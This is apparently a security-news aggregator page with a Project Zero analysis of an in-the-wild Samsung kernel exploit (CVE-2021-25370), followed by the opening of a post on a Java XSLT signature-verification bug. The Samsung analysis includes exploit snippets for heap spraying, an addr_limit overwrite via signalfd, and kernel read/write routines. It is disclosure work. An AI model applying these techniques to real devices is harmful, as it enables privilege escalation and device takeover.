The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes. 


/**

 * struct sync_file - sync file to export to the userspace

 * @file:               file representing this fence

 * @sync_file_list:     membership in global file list

 * @wq:                 wait queue for fence signaling

 * @fence:              fence with the fences in the sync_file

 * @cb:                 fence callback information

 */

struct sync_file {

        struct file             *file;

        /**

         * @user_name:

         *

         * Name of the sync file provided by userspace, for merged fences.

         * Otherwise generated through driver callbacks (in which case the

         * entire array is 0).

         */

        char                    user_name[32];

#ifdef CONFIG_DEBUG_FS

        struct list_head        sync_file_list;

#endif


        wait_queue_head_t       wq;

        unsigned long           flags;


        struct dma_fence        *fence;

        struct dma_fence_cb cb;

};


The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.


static int decon_set_win_config(struct decon_device *decon,

                struct decon_win_config_data *win_data)

{

        int num_of_window = 0;

        struct decon_reg_data *regs;

        struct sync_file *sync_file;

        int i, j, ret = 0;


[...]


        num_of_window = decon_get_active_win_count(decon, win_data);

        if (num_of_window) {

                win_data->retire_fence = decon_create_fence(decon, &sync_file);

                if (win_data->retire_fence < 0)

                        goto err_prepare;

        } else {


[...]


        if (num_of_window) {

                fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }


[...]


        return ret;

}


In this case, decon_set_win_config acquires the fd for retire_fence in decon_create_fence.


int decon_create_fence(struct decon_device *decon, struct sync_file **sync_file)

{

        struct dma_fence *fence;

        int fd = -EMFILE;


        fence = kzalloc(sizeof(*fence), GFP_KERNEL);

        if (!fence)

                return -ENOMEM;


        dma_fence_init(fence, &decon_fence_ops, &decon->fence.lock,

                   decon->fence.context,

                   atomic_inc_return(&decon->fence.timeline));


        *sync_file = sync_file_create(fence);

        dma_fence_put(fence);

        if (!(*sync_file)) {

                decon_err("%s: failed to create sync file\n", __func__);

                return -ENOMEM;

        }


        fd = decon_get_valid_fd();

        if (fd < 0) {

                decon_err("%s: failed to get unused fd\n", __func__);

                fput((*sync_file)->file);

        }


        return fd;

}


The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct. 


void decon_create_release_fences(struct decon_device *decon,

                struct decon_win_config_data *win_data,

                struct sync_file *sync_file)

{

        int i = 0;


        for (i = 0; i < decon->dt.max_win; i++) {

                int state = win_data->config[i].state;

                int rel_fence = -1;


                if (state == DECON_WIN_STATE_BUFFER) {

                        rel_fence = decon_get_valid_fd();

                        if (rel_fence < 0) {

                                decon_err("%s: failed to get unused fd\n",

                                                __func__);

                                goto err;

                        }


                        fd_install(rel_fence, get_file(sync_file->file));

                }

                win_data->config[i].rel_fence = rel_fence;

        }

        return;

err:

        while (i-- > 0) {

                if (win_data->config[i].state == DECON_WIN_STATE_BUFFER) {

                        put_unused_fd(win_data->config[i].rel_fence);

                        win_data->config[i].rel_fence = -1;

                }

        }

        return;

}


decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.


When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.

Fixing the vulnerability

Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.


        if (num_of_window) {

-               fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }


        decon_hiber_block(decon);


        mutex_lock(&decon->up.lock);

        list_add_tail(&regs->list, &decon->up.list);

+       atomic_inc(&decon->up.remaining_frame);

        decon->update_regs_list_cnt++;

+       win_data->extra.remained_frames = atomic_read(&decon->up.remaining_frame);


        mutex_unlock(&decon->up.lock);

        kthread_queue_work(&decon->up.worker, &decon->up.work);


+       /*

+        * The code is moved here because the DPU driver may get a wrong fd

+        * through the released file pointer,

+        * if the user(HWC) closes the fd and releases the file pointer.

+        *

+        * Since the user land can use fd from this point/time,

+        * it can be guaranteed to use an unreleased file pointer

+        * when creating a rel_fence in decon_create_release_fences(...)

+        */

+       if (num_of_window)

+               fd_install(win_data->retire_fence, sync_file->file);


        mutex_unlock(&decon->lock);

Heap Grooming and Spray

To groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:


fake_file.f_u = 0x1010101;

fake_file.f_op = kaddr - 0x2071B0+0x1094E80;

fake_file.f_count = 0x7F;

fake_file.private_data = addr_limit_ptr;


The f_op member is set to the signalfd_op for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address also leaked using vulnerability #2.


The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver. 

/**

 * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel

 * @buffer: Pointer to the information

 * @len: Length

 * @padding: Padding

 *

 * The data provided is accessible through a debugfs file

 */

struct kbase_ioctl_mem_profile_add {

        __u64 buffer;

        __u32 len;

        __u32 padding;

};


#define KBASE_ioctl_MEM_PROFILE_ADD \

        _IOW(KBASE_ioctl_TYPE, 27, struct kbase_ioctl_mem_profile_add)


static int kbase_api_mem_profile_add(struct kbase_context *kctx,

                struct kbase_ioctl_mem_profile_add *data)

{

        char *buf;

        int err;


        if (data->len > KBASE_MEM_PROFILE_MAX_BUF_SIZE) {

                dev_err(kctx->kbdev->dev, "mem_profile_add: buffer too big\n");

                return -EINVAL;

        }


        buf = kmalloc(data->len, GFP_KERNEL);

        if (ZERO_OR_NULL_PTR(buf))

                return -ENOMEM;


        err = copy_from_user(buf, u64_to_user_ptr(data->buffer),

                        data->len);

        if (err) {

                kfree(buf);

                return -EFAULT;

        }


        return kbasep_mem_profile_debugfs_insert(kctx, buf, data->len);

}



This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.


Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. Whenever Android launches new requirements like this, it only applies to devices launched on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020 so it makes sense that the exploit targeted devices Android 10 and before where DebugFS would have been mounted.



For example, on the A51 exynos device (SM-A515F) which launched on Android 10, both CONFIG_DEBUG_FS is enabled and DebugFS is mounted. 


a51:/ $ getprop ro.build.fingerprint

samsung/a51nnxx/a51:11/RP1A.200720.012/A515FXXU4DUB1:user/release-keys

a51:/ $ getprop ro.build.version.security_patch

2021-02-01

a51:/ $ uname -a

Linux localhost 4.14.113-20899478 #1 SMP PREEMPT Mon Feb 1 15:37:03 KST 2021 aarch64

a51:/ $ cat /proc/config.gz | gunzip | cat | grep CONFIG_DEBUG_FS                                                                          

CONFIG_DEBUG_FS=y


a51:/ $ cat /proc/mounts | grep debug                                                                                                      

/sys/kernel/debug /sys/kernel/debug debugfs rw,seclabel,relatime 0 0


Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.


#ifdef CONFIG_DEBUG_FS


int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        int err = 0;


        mutex_lock(&kctx->mem_profile_lock);


        dev_dbg(kctx->kbdev->dev, "initialised: %d",

                kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));


        if (!kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                if (IS_ERR_OR_NULL(kctx->kctx_dentry)) {

                        err  = -ENOMEM;

                } else if (!debugfs_create_file("mem_profile", 0444,

                                        kctx->kctx_dentry, kctx,

                                        &kbasep_mem_profile_debugfs_fops)) {

                        err = -EAGAIN;

                } else {

                        kbase_ctx_flag_set(kctx,

                                           KCTX_MEM_PROFILE_INITIALIZED);

                }

        }


        if (kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                kfree(kctx->mem_profile_data);

                kctx->mem_profile_data = data;

                kctx->mem_profile_size = size;

        } else {

                kfree(data);

        }


        dev_dbg(kctx->kbdev->dev, "returning: %d, initialised: %d",

                err, kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));


        mutex_unlock(&kctx->mem_profile_lock);


        return err;

}



#else /* CONFIG_DEBUG_FS */


int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        kfree(data);

        return 0;

}

#endif /* CONFIG_DEBUG_FS */


By writing the fake file structs as a singular 0x2000 size buffer rather than as 25 individual 0x140 size buffers, the exploit will be writing their fake structs to two whole pages which increases the odds of reallocating over the freed file struct.


The exploit then calls dup2 on the dangling FD’s. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that they successfully reallocated a fake file structure in the same place as the freed file structure. dup2 will increment the reference count (f_count) in the file structure. In all of our fake file structures, the f_count was set to 0x7F. So if any of them are incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.


To determine if any of the file struct’s refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.

Overwriting the addr_limit

Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or 0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF.  


Userspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.


signalfd(dangling_fd, 0xFFFFFF8000000000, 8);


According to the man pages, the syscall signalfd is:

signalfd() creates a file descriptor that can be used to accept signals targeted at the caller.  This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).


int signalfd(int fd, const sigset_t *mask, int flags);


The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the signmask of the signalfd_ctx struct.. 


typedef unsigned long sigset_t;


struct signalfd_ctx {

        sigset_t sigmask;

};


The file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8 byte structure that contains the mask.


Let’s walk through how the signalfd source code updates the mask: 


SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,

                size_t, sizemask, int, flags)

{

        sigset_t sigmask;

        struct signalfd_ctx *ctx;


        /* Check the SFD_* constants for consistency.  */

        BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);

        BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);


        if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))

                return -EINVAL;


        if (sizemask != sizeof(sigset_t) ||

            copy_from_user(&sigmask, user_mask, sizeof(sigmask)))

               return -EINVAL;

        sigdelsetmask(&sigmask, sigmask(SIGKILL) | sigmask(SIGSTOP));

        signotset(&sigmask);                                      // [1]


        if (ufd == -1) {                                          // [2]

                ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);

                if (!ctx)

                        return -ENOMEM;


                ctx->sigmask = sigmask;


                /*

                 * When we call this, the initialization must be complete, since

                 * anon_inode_getfd() will install the fd.

                 */

                ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,

                                       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));

                if (ufd < 0)

                        kfree(ctx);

        } else {                                                 // [3]

                struct fd f = fdget(ufd);

                if (!f.file)

                        return -EBADF;

                ctx = f.file->private_data;                      // [4]

                if (f.file->f_op != &signalfd_fops) {            // [5]

                        fdput(f);

                        return -EINVAL;

                }

                spin_lock_irq(&current->sighand->siglock);

                ctx->sigmask = sigmask;                         // [6] WRITE!

                spin_unlock_irq(&current->sighand->siglock);


                wake_up(&current->sighand->signalfd_wqh);

                fdput(f);

        }


        return ufd;

}


First the function modifies the mask that was passed in. The mask passed into the function is the signals that should be accepted via the file descriptor, but the sigmask member of the signalfd struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] makes this change. The call to sigdelsetmask ensures that the SIG_KILL and SIG_STOP signals are always blocked so it clears bit 8 (SIG_KILL) and bit 18 (SIG_STOP) in order for them to be set in the next call. Then signotset flips each bit in the mask. The mask that is written is ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF). 


The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer. 


The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks if the underlying file’s f_op equals the signalfd_ops. This is why the f_op was set to signalfd_ops in the previous section. Finally at [6], the overwrite occurs. The user provided mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.


The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. So the value ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFCFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We’ll talk about why they’re overwriting the addr_limit as USER_DS rather than KERNEL_DS in the next section. 

Working Around UAO and PAN

“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both PAN and UAO are hardware mitigations released on ARMv8 CPUs. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.


It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.


void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {

  errno = 0;

  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);

  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");

  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");

}


This technique works by first writing the pointer to the buffer of the contents that you’d like written to one end of the pipe. By then calling a read and passing in the kernel address you’d like to write to, those contents are then written to that kernel memory address.


With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.


Let’s say we didn’t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that’s not KERNEL_DS. PAN wouldn’t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.


The way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and is disabled when it does not.


/* Restore the UAO state depending on next's addr_limit */

void uao_thread_switch(struct task_struct *next)

{

        if (IS_ENABLED(CONFIG_ARM64_UAO)) {

                if (task_thread_info(next)->addr_limit == KERNEL_DS)

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(1), ARM64_HAS_UAO));

                else

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(0), ARM64_HAS_UAO));

        }

}


The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function to write to kernel addresses is shown below:


kernel_write(void *kaddr, const void *buf, unsigned long buf_len)

{

  unsigned long USER_DS = 0x7FFFFFFFFF;

  write(kernel_rw_pipe2, buf, buf_len);                   // [1]

  write(kernel_rw_pipe2, &USER_DS, 8u);                   // [2]

  set_addr_limit_to_KERNEL_DS();                          // [3]             

  read(kernel_rw_pipe, kaddr, buf_len);                   // [4]

  read(kernel_rw_pipe, addr_limit_ptr, 8u);               // [5]

}


The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the buffer pointer to the pipe. A pointer to the USER_DS value is written to the pipe at [2].


The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit. 


Now that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit’s function to read from kernel memory is the mirror image of this function.


I deliberately am not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit. 

Post-exploitation

The exploit now has arbitrary kernel read and write. It then follows the steps as seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process’s context to vold. vold is the “Volume Daemon” which is responsible for mounting and unmounting of external storage. vold runs as root and while it's a userspace service, it’s considered kernel-equivalent as described in the Android documentation on security contexts. Because it’s a highly privileged security context, it makes a prime target for changing the SELinux context to.



As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.

Conclusion

This in-the-wild exploit chain is a great example of different attack surfaces and “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel. It’s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety. Of the 10 other Android in-the-wild 0-days that we’ve tracked since mid-2014, only 2 of those were not memory corruption vulnerabilities.


The first vulnerability in this chain, the arbitrary file read and write, CVE-2021-25337, was the foundation of this chain, used 4 different times and used at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. The Java components in Android devices don’t tend to be the most popular targets for security researchers despite it running at such a privileged level. This highlights an area for further research.


Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know. 


The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage. 


This transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.


Kategorie: Hacking & Security

Gregor Samsa: Exploiting Java's XML Signature Verification

2 Listopad, 2022 - 12:41

By Felix Wilhelm, Project Zero


Earlier this year, I discovered a surprising attack surface hidden deep inside Java’s standard library: A custom JIT compiler processing untrusted XSLT programs, exposed to remote attackers during XML signature verification. This post discusses CVE-2022-34169, an integer truncation bug in this JIT compiler resulting in arbitrary code execution in many Java-based web applications and identity providers that support the SAML single-sign-on standard. 

OpenJDK fixed the discussed issue in July 2022. The Apache BCEL project used by Xalan-J, the origin of the vulnerable code, released a patch in September 2022


While the vulnerability discussed in this post has been patched , vendors and users should expect further vulnerabilities in SAML.


From a security researcher's perspective, this vulnerability is an example of an integer truncation issue in a memory-safe language, with an exploit that feels very much like a memory corruption. While less common than the typical memory safety issues of C or C++ codebases, weird machines still exist in memory safe languages and will keep us busy even after we move into a bright memory safe future.


Before diving into the vulnerability and its exploit, I’m going to give a quick overview of XML signatures and SAML. What makes XML signatures such an interesting target and why should we care about them?

Introduction

XML Signatures are a typical example of a security protocol invented in the early 2000’s. They suffer from high complexity, a large attack surface and a wealth of configurable features that can weaken or break its security guarantees in surprising ways. Modern usage of XML signatures is mostly restricted to somewhat obscure protocols and legacy applications, but there is one important exception: SAML. SAML, which stands for Security Assertion Markup Language, is one of the two main Single-Sign-On standards used in modern web applications. While its alternative, the OAuth based OpenID Connect (OIDC) is gaining popularity, SAML is still the de-facto standard for large enterprises and complex integrations. 


SAML relies on XML signatures to protect messages forwarded through the browser. This turns XML signature verification into a very interesting external attack surface for attacking modern multi-tenant SaaS applications. While you don’t need a detailed understanding of SAML to follow this post, interested readers can take a look at Okta's Understanding SAML writeup or the SAML 2.0 wiki entry to get a better understanding of the protocol.


SAML SSO logins work by exchanging XML documents between the application, known as service provider (SP), and the identity provider (IdP). When a user tries to login to an SP, the service provider creates a SAML request. The IdP looks at the SAML request, tries to authenticate the user and sends a SAML response back to the SP. A successful response will contain information about the user, which the application can then use to grant access to its resources. 


In the most widely used SAML flow (known as SP Redirect Bind / IdP POST Response) these documents are forwarded through the user's browser using HTTP redirects and POST requests. To protect against modification by the user, the security critical part of the SAML response (known as Assertion) has to be cryptographically signed by the IdP. In addition, the IdP might require SPs to also sign the SAML request to protect against impersonation attacks.

This means that both the IdP and the SP have to parse and verify XML signatures passed to them by a potential malicious actor. Why is this a problem? Let's take a closer look at the way XML signatures work:


XML Signatures

Most signature schemes operate on a raw byte stream and sign the data as seen on the wire. Instead, the XML signature standard (known as XMLDsig) tries to be robust against insignificant changes to the signed XML document. This means that changing whitespaces, line endings or comments in a signed document should not invalidate its signature. 


An XML signature consists of a special Signature element, an example of which is shown below:

<Signature>

  <SignedInfo>

    <CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>

    <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />

    <Reference URI="#signed-data">

       <Transforms>

       …

       </Transforms>

       <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />

       <DigestValue>9bc34549d565d9505b287de0cd20ac77be1d3f2c</DigestValue>

    </Reference>

  </SignedInfo>

  <SignatureValue>....</SignatureValue>

  <KeyInfo><X509Certificate>....</X509Certificate></KeyInfo>

</Signature>


  • The  SignedInfo child contains  CanonicalizationMethod and SignatureMethod elements as well as one or more Reference elements describing the integrity protected data. 

  • KeyInfo describes the signer key and can contain a raw public key, a X509 certificate or just a key id. 

  • SignatureValue contains the cryptographic signature (using SignatureMethod) of the SignedInfo element after it has been canonicalized using CanonicalizationMethod. 


At this point, only the integrity of the SignedInfo element is protected. To understand how this protection is extended to the actual data, we need to take a look at the way Reference elements work: In theory the Reference URI attribute can either point to an external document (detached signature), an element embedded as a child (enveloping signature) or any element in the outer document (enveloped signature). In practice, most SAML implementations use enveloped signatures and the Reference URI will point to the signed element somewhere in the current document tree.


When a Reference is processed during verification or signing, the referenced content is passed through a chain of Transforms. XMLDsig supports a number of transforms ranging from canonicalization, over base64 decoding to XPath or even XSLT. Once all transforms have been processed the resulting byte stream is passed into the cryptographic hash function specified with the DigestMethod element and the result is stored in DigestValue. 

This way, as the whole Reference element is part of SignedInfo, its integrity protection gets extended to the referenced element as well. 


Validating a XML signature can therefore be split into two separate steps:

  • Reference Validation: Iterate through all embedded references and for each reference fetch the referenced data, pump it through the Transforms chain and calculate its hash digest. Compare the calculated Digest with the stored DigestValue and fail if they differ.

  • Signature Validation: First canonicalize the SignedInfo element using the specified CanonicalizationMethod algorithm. Calculate the signature of SignedInfo using the algorithm specified in SignatureMethod and the signer key described in KeyInfo. Compare the result with SignatureValue and fail if they differ.


Interestingly, the order of these two steps can be implementation specific. While the XMLDsig RFC lists Reference Validation as the first step, performing Signature Validation first can have security advantages as we will see later on.


Correctly validating XML signatures and making sure the data we care about is protected, is very difficult in the context of SAML. This will be a topic for later blog posts, but at this point we want to focus on the reference validation step:


As part of this step, the application verifying a signature has to run attacker controlled transforms on attacker controlled input. Looking at the list of transformations supported by XMLDsig, one seems particularly interesting: XSLT. 


XSLT, which stands for Extensible Stylesheet Language Transformations, is a feature-rich XML based programming language designed for transforming XML documents. Embedding a XSLT transform in a XML signature means that the verifier has to run the XSLT program on the referenced XML data. 


The code snippet below gives you an example of a simple XSLT transformation. When executed it fetches each <data> element stored inside <input>, grabs the first character of its content and returns it as part of its <output>. So <input><data>abc</data><data>def</data></input> would be transformed into <output><data>a</data><data>d</data></output>

<Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">

  <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

   xmlns="http://www.w3.org/TR/xhtml1/strict" exclude-result-prefixes="foo"   

   version="1.0">

   <xsl:output encoding="UTF-8" indent="no" method="xml" />

   <xsl:template match="/input">

                    <output>

                          <xsl:for-each select="data">

                              <data><xsl:value-of select="substring(.,1,1)" /></data>

                          </xsl:for-each>

                    </output>

  </xsl:template>

 </xsl:stylesheet>

</Transform>


Exposing a fully-featured language runtime to an external attacker seems like a bad idea, so let's take a look at how this feature is implemented in Java’s OpenJDK.


XSLT in Java

Java’s main interface for working with XML signatures is the java.xml.crypto.XMLSignature class and its sign and validate methods. We are mostly interested in the validate method which is shown below:


// https://github.com/openjdk/jdk/blob/master/src/java.xml.crypto/share/classes/org/jcp/xml/dsig/internal/dom/DOMXMLSignature.java

@Override

    public boolean validate(XMLValidateContext vc)

        throws XMLSignatureException

    {

        [..]

        // validate the signature

        boolean sigValidity = sv.validate(vc); (A)

        if (!sigValidity) {

            validationStatus = false;

            validated = true;

            return validationStatus;

        }


        // validate all References

        @SuppressWarnings("unchecked")

        List<Reference> refs = this.si.getReferences();

        boolean validateRefs = true;

        for (int i = 0, size = refs.size(); validateRefs && i < size; i++) {

            Reference ref = refs.get(i);

            boolean refValid = ref.validate(vc); (B)

            LOG.debug("Reference [{}] is valid: {}", ref.getURI(), refValid);

            validateRefs &= refValid;

        }

        if (!validateRefs) {

            LOG.debug("Couldn't validate the References");

            validationStatus = false;

            validated = true;

            return validationStatus;

        } 

   [..]

   }


As we can see, the validate method first validates the signature of the SignedInfo element in (A) before validating all the references in (B).  This means that an attack against the XSLT runtime will require a valid signature for the SignedInfo element and we’ll discuss later how an attacker can bypass this requirement.


The call to ref.validate() in (B) ends up in the DomReference.validate method shown below:

public boolean validate(XMLValidateContext validateContext)

        throws XMLSignatureException

    {

        if (validateContext == null) {

            throw new NullPointerException("validateContext cannot be null");

        }

        if (validated) {

            return validationStatus;

        }

        Data data = dereference(validateContext); (D)

        calcDigestValue = transform(data, validateContext); (E)


        [..]

        validationStatus = Arrays.equals(digestValue, calcDigestValue); (F)

        validated = true;

        return validationStatus;

    }




The code gets the referenced data in (D), transforms it in (E) and compares the digest of the result with the digest stored in the signature in (F). Most of the complexity is hidden behind the call to transform in (E) which loops through all Transform elements defined in the Reference and executes them.


As this is Java, we have to walk through a lot of indirection layers before we end up at the interesting parts. Take a look at the call stack below if you want to follow along and step through the code:


at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:584) at com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl.newTransformer(TransformerFactoryImpl.java:818) at com.sun.org.apache.xml.internal.security.transforms.implementations.TransformXSLT.enginePerformTransform(TransformXSLT.java:130) at com.sun.org.apache.xml.internal.security.transforms.Transform.performTransform(Transform.java:316) at org.jcp.xml.dsig.internal.dom.ApacheTransform.transformIt(ApacheTransform.java:188) at org.jcp.xml.dsig.internal.dom.ApacheTransform.transform(ApacheTransform.java:124) at org.jcp.xml.dsig.internal.dom.DOMTransform.transform(DOMTransform.java:173) at org.jcp.xml.dsig.internal.dom.DOMReference.transform(DOMReference.java:457) at org.jcp.xml.dsig.internal.dom.DOMReference.validate(DOMReference.java:387) at org.jcp.xml.dsig.internal.dom.DOMXMLSignature.validate(DOMXMLSignature.java:281)


If we specify a XSLT transform and the org.jcp.xml.dsig.secureValidation property isn't enabled (we’ll come back to this later) we will end up in the file src/java.xml/share/classes/com/sun/org/apache/xalan/internal/xsltc/trax/TransformerFactoryImpl.java which is part of a module called XSLTC.


